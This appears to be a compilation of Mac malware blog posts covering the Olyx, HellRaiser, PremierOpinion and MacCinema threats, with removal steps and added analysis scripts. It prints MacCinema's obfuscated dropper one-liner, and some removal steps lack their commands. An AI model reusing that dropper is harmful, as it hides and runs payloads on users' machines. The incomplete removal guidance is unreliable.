In my last blog post, I discussed the early features of the RAT ‘Blackhole’. Although it was then at an early stage, I find this type of offensive development interesting because such tools emerge and are distributed as hacking tools with a functional backdoor client-server mechanism.
Last month we spotted a new piece of malware, a backdoor server called ‘Olyx’. The file is a Mach-O binary, and traces of the working directory left in it suggest that the Mac user name of its author is ‘yxl’, which is where the name ‘Olyx’ comes from.
Backdoor ‘Olyx’ was spotted in a package called ‘PortalCurrent events-2009 July 5.rar’, whose content suggests that it was saved from the Wikipedia Community Portal ‘Current events’ page for 5 July 2009. If you visit that Wikipedia page and compare it with the screenshot below, you’ll find them very similar.
However, the extracted archive also includes a folder containing photos of the 15 June 2011 protest in Athens, Greece, alongside the two malicious executables:
There’s another folder called ‘Photo-Current events 2009 July 5’, which contains 21 (disturbing) photos.
Q: So, the question now is: what happened on ‘2009 July 5’?
The World Uyghur Congress website describes it:
On 5 July 2009, Uyghurs in Urumqi, the capital of East Turkestan, staged a peaceful protest which was suppressed by Chinese security forces and subsequently led to ethnic unrest in the city that left hundreds of people dead.
Q: Ok, that was 2 years ago, right?
Yes, and a press release titled “Worldwide Uyghur Protests on Second Anniversary of 5 July 2009” describes the present:
On July 5, 2011 and in the days surrounding July 5th, the WUC called the Uyghurs in exile and their supporters around the globe to stage demonstrations and other actions to commemorate the second anniversary of one of the saddest and most tragic days in the history of the Uyghur people and of East Turkestan and to ensure that the world does not forget about the devastating plight of the Uyghur people.
So there is a call for organized demonstrations to remind the whole world of the 2009 event and to support Uyghur human rights and freedom.
Q: What is the protest about? This Facebook invitation page explains:
Approaching the second anniversary of these events, and despite international calls, no independent investigation into the incident has been allowed by the Chinese authorities and the number of people killed, detained, imprisoned, executed and disappeared remains unclear.
The activities surrounding this protest clearly extended into cyberspace, resulting in attacks described in the press release titled “World Uyghur Congress (WUC) Victim of DDoS Cyber Attacks”:
Approaching the second anniversary of the 5 July 2009 events, the World Uyghur Congress (WUC) has again been the victim of cyber attacks.
So, how do you think Backdoor ‘Olyx’ fits into this picture?
The discovery of this threat should remind Mac users to consider security carefully, along with the real-life consequences of getting pwned. Remember, this type of threat is on a mission; this is not a cybercriminal who monetizes infections or steals money.
1) Kill the running processes.
Using Spotlight, type Activity Monitor, filter by searching for starfieldUpdate and click Quit Process. Then search for offSyncService and click Quit Process.
If using Terminal, you may run the following command:
2) Delete Starfield internet plugins and components.
Using Terminal, you may run the following command:
3) Removing the following files will require the root password.
These instructions remove all traces of Starfield. Stay safe!
**Note: If you find the Starfield application useful, you may keep ‘WBE Desktop Notified.App’ and ‘DesktopTools.App’.
From Intego’s security advisory today:
Description: Intego has discovered a spyware application that is installed by a number of freely distributed Mac applications and screen savers found on a variety of websites.
PremierOpinion is part of an online market research community with over 2 million members worldwide. PremierOpinion relies on its members to gain valuable insight into Internet trends and behavior. In exchange for participating in periodic surveys on topics of interest to the Internet community, and for having their Internet browsing and purchasing activity monitored, PremierOpinion sponsors select software that its members can enjoy for free.
So, who’s the partner?
The “PremierOpinion” Mac OS X spyware is distributed by 7art-screensavers and published at this link: http://7art-screensavers.com/Mac_OS_X.shtml
The Intego blog published a detailed list of “PremierOpinion” Mac OS X spyware [here].
There are 48 Mac OS X screensaver apps at this source, and they come as two different packages.
How to spot “PremierOpinion” Mac OS X Spyware?
1. It uses the IzPack (“Package once. Deploy everywhere.”) installer generator. On inspecting the package (control+click the application and choose ‘Show Package Contents’ from the pop-up menu), you’ll notice that the icons differ: one carries the 7art icon, the other izpack.icns.
2. IzPack-generated installers are Java Archive (.JAR) files.
3. Installing the 7art screen savers does NOT require the root password, whereas the PremierOpinion-sponsored free software does. Why? Because it installs spyware that tracks and monitors the user’s browsing behaviour, scans and gathers information from the disk, and sends it back to its remote server. This is very persistent spyware, meaning it does NOT want to be uninstalled.
4. Spyware installs software without the user’s consent or notification. It is often bundled with an otherwise clean application to mislead users about its true purpose and gain access to their system. In this case, even if you click “Cancel”, the IzPack installer continues with two pop-up screens: 1) the PremierOpinion survey (screenshot) and 2) the 7art screen saver installation (screenshot).
“Package once. Deploy everywhere.”
This sneaky Mac OS X threat could be bundled and distributed anywhere on the internet.
Be cautious and stay safe!
——–> Threat Info FYI
File Name: poinstaller
File Type: Mach-O executable i386
File Size: 470,352 bytes
Threat Type: Backdoor, Downloader, Sniffer, Stealer
Installation Requirement: root
Remote Activity: Installation of other threats
Remote Download File: Rule14.xml
Remote Download: PermissionResearch.zip
File Type: Mach-O executable i386
RAT for Mac?
With so many RATs (Remote Administration Tools) available for Windows, people wonder whether there is a good and useful RAT for Mac as well.
The searches and discussions on this topic go on and on; at one point an online poll favoured continuing the development:
A useful description of RATs that work on OS X can be found here.
The most recent development is HellRaiser version 4.2, coded by DCHKG, an underground Mac programming team.
HellRaiser includes a configuration component, in which the remote controller can specify the server parameters.
The server component is the application distributed to the target OS X user. It must be executed manually to install itself and run in the background (hidden from the Dock). Once that succeeds, the server component (the slave) reports back to the master, as shown below.
How would I know if the HellRaiser server is installed or running?
Option 1: Open Network Utility and Activity Monitor (/Applications/Utilities/), identify the process and kill it.
Option 2: Open Terminal and type
lsof -i (this lists running processes and their matching network/internet connections). Look for a dubious name or connection, take note of the PID, and then type
kill -9 <PID> (this kills the process).
If you’re using a Mac security scanner, now is the best time to check for a signature update! (Most vendors detect this as OSX HellRTS.)
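The manual routine above (and the Starfield removal steps earlier on this page: find the process by name, check what it is talking to, then quit it) is the same every time, so here is a small POSIX shell helper for it. This is an added example, not code from the original posts or from any of the tools discussed: the process names starfieldUpdate and offSyncService are the ones the Starfield post gives, and the listings are read from stdin so the matching can be exercised against constructed `ps` and `lsof` output.

```shell
#!/bin/sh
# Added example, not from the original posts: helper for the manual
# "find the process, review its network connection, then kill it" routine.
# Listings are read from stdin so the matching can be checked on constructed
# input; the names used in the usage comments are those from the Starfield post.

# match_procs PATTERN
#   Reads "PID COMMAND" lines (as printed by `ps -axo pid=,comm=`) on stdin and
#   prints the PID of every process whose command name contains PATTERN,
#   case-insensitively, so a renamed variant with different capitalisation
#   does not slip past a visual search in Activity Monitor.
match_procs() {
    pat=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    while read -r pid comm; do
        lc=$(printf '%s' "$comm" | tr 'A-Z' 'a-z')
        case "$lc" in
            *"$pat"*) printf '%s\n' "$pid" ;;
        esac
    done
}

# list_net_procs
#   Reads `lsof -i -n -P` output on stdin and prints "PID COMMAND ENDPOINTS"
#   for every established connection, so unfamiliar names can be reviewed
#   before anything is killed. The header line is skipped.
list_net_procs() {
    awk 'NR > 1 && /ESTABLISHED/ { print $2, $1, $(NF-1) }'
}

# kill_named PATTERN [SIGNAL]
#   Terminates every live process matching PATTERN. Dry run unless DO_KILL=1;
#   SIGNAL defaults to TERM so the process may exit cleanly, with KILL
#   (the post's `kill -9`) kept as the fallback for a process that ignores TERM.
kill_named() {
    sig=${2:-TERM}
    ps -axo pid=,comm= | match_procs "$1" | while read -r pid; do
        if [ "${DO_KILL:-0}" = 1 ]; then
            kill -s "$sig" "$pid" && echo "sent $sig to $pid"
        else
            echo "would send $sig to $pid (set DO_KILL=1 to do it)"
        fi
    done
}

# Usage: sh thisfile.sh starfieldUpdate            (dry run)
#        DO_KILL=1 sh thisfile.sh offSyncService KILL
if [ $# -gt 0 ]; then
    echo "Established connections:"
    lsof -i -n -P 2>/dev/null | list_net_procs
    kill_named "$1" "$2"
fi
```

Run it with no arguments to define the functions only; with a process name it first prints the established connections so the `lsof` review step is not skipped, then reports what it would kill, and only sends the signal when DO_KILL=1 is set.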
Last week I spotted a modified version of MacCinema. The change was not significant; the modification was purely to avoid detection by scanners.
The script looks like this:
if [ $# != 1 ]; then type=0; else type=1; fi && tail -53 $0 | sed 's/lala/nigeb/' | sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//' | tail -r | uudecode -o /dev/stdout | sed 's/applemac/AdobeFlash/' | sed 's/bsd/7037/' | sed 's/gnu/'$type'/' >`uname -p` && sh `uname -p` && rm `uname -p` && exit
agazagiz 666 lala
Anyway, this backdoor trojan is massively distributed around the internet. It uses Google SEO, so most users stumble onto these malicious sites from Google searches.
Some lure Mac users with promises of free downloads of full-version software, cracks, serials, activators, generators, keys and fixes, just like the screenshot below.
…while others link to Mac videos, like the PornTube page below.
Some malware-serving sites are a bit more aggressive: rather than asking the user to download the DMG file, they download it automatically and it is mounted, because opening ‘safe’ files after downloading is turned on by default. You can disable this by following these instructions:
1. Open Safari
2. Open “Preferences” under the “Safari” menu
3. Click on the “General” tab
4. Un-check the “Open ’safe’ files after downloading” box
5. Close Safari’s preferences
These instructions have been discussed here previously.
A slightly modified variant of MacCinema was spotted in “MacPlay.dmg”. Once executed, it still displays the MacCinema installer. However, a few modifications were found in the preinstall and preupgrade scripts, as shown in Figure 01.
Obviously, attackers are trying to get the most out of these threats. The obfuscated data extracts another script, which we have already seen in the previous variant.
This Trojan has been in the wild for months now, and as it continues to proliferate across the internet, new Macintosh users keep falling for its tricks.
Stay away from this threat!
Another modified version of “MacCinema” poses as a cracked copy of “Avid.Xpress.Pro.5.7.2.dmg”.
This variant was recently added to MacScan’s list; if you’re using it, check regularly here -> http://macscan.securemac.com/spyware-list
It was also recently blogged about by Intego @ http://blog.intego.com/
What’s new? Nothing really, except these few strings: “yksrepsak 777 nigeb”
…which, read backwards, is “begin 777 kaspersky”.
“enialbdivad 777 nigeb” remains the same as discussed in the previous post “Latest Threat: MacCinema”.
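The reversed “nigeb” headers quoted here are the same trick used by the MacCinema dropper script shown earlier on this page: the appended data is a uuencoded file whose lines were reversed character by character and written bottom-up, and the pipeline `sed 's/lala/nigeb/' | sed '<reverse each line>' | tail -r | uudecode` undoes that before running the result. The Python below is an added analysis aid, not code from the original posts or from the malware: it performs the same unscrambling and uudecoding in pure Python on a sample read from disk, so an analyst can recover the next-stage script without executing the dropper. It handles both header styles (the ‘lala’ placeholder of the first sample and the literal ‘nigeb’ of these variants). The embedded SAMPLE_BLOB is constructed for this example (it decodes to the harmless string `echo hello`, under the made-up file name ‘sample’) and is not taken from any real sample.

```python
"""Added example (not from the original posts): undo the MacCinema-style
obfuscation without executing anything.

Dropper pipeline being reproduced:
    tail -53 $0 | sed 's/lala/nigeb/' | sed '<reverse each line>' | tail -r | uudecode
The subsequent sed substitutions and the `sh` step are deliberately NOT
reproduced; this stops at the recovered bytes.
"""
import binascii
from typing import Tuple

# Constructed sample (not from a real file): the uuencoded text of the
# 11-byte payload b"echo hello\n", file name 'sample', mode 666, scrambled
# the way the dropper expects. A real sample's header read 'agazagiz 666 lala'.
SAMPLE_BLOB = "dne\n`\n`HP;LQ69H!R;H-69+\nelpmas 666 lala\n"


def unscramble(blob: str) -> str:
    """Reverse the line-level scrambling.

    Equivalent to: sed 's/lala/nigeb/' (first match per line), the classic
    sed per-line character reversal, then `tail -r` (reverse line order).
    Lines that already contain 'nigeb' pass through the first step unchanged,
    so the 'yksrepsak 777 nigeb' style variants are handled too.
    """
    lines = [line.replace("lala", "nigeb", 1) for line in blob.splitlines()]
    lines = [line[::-1] for line in lines]
    lines.reverse()
    return "\n".join(lines) + "\n"


def uudecode(text: str) -> Tuple[str, int, bytes]:
    """Minimal uudecode: return (file name, mode, payload bytes).

    Only the 'begin ... end' block is decoded; nothing is written to disk.
    """
    lines = text.splitlines()
    try:
        start = next(i for i, l in enumerate(lines) if l.startswith("begin "))
    except StopIteration:
        raise ValueError("no uuencode 'begin' line found")
    _, mode, name = lines[start].split(" ", 2)
    out = bytearray()
    for line in lines[start + 1:]:
        if line == "end":
            break
        if not line:
            continue
        # a lone '`' line is the zero-length terminator and yields b''
        out += binascii.a2b_uu(line)
    return name, int(mode, 8), bytes(out)


def deobfuscate(blob: str) -> Tuple[str, int, bytes]:
    """Full recovery: scrambled appended data -> (name, mode, next-stage bytes)."""
    return uudecode(unscramble(blob))


if __name__ == "__main__":
    name, mode, payload = deobfuscate(SAMPLE_BLOB)
    print(f"recovered {name!r} (mode {mode:o}), {len(payload)} bytes:")
    print(payload.decode("ascii", errors="replace"))
```

For a sample on disk, feed it the tail of the file (the lines after the one-line dropper) instead of SAMPLE_BLOB; the header line that comes out of `unscramble` shows the original file name the author chose, which is where strings like “kaspersky” and “davidblaine” come from.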
The bottom line is that these threats are active and in the wild. They are trying to play hide-and-seek with security scanners by applying obfuscation and changing a few strings.
To remove this threat, just follow the MacAccess removal instructions.
Stay alert and always be informed!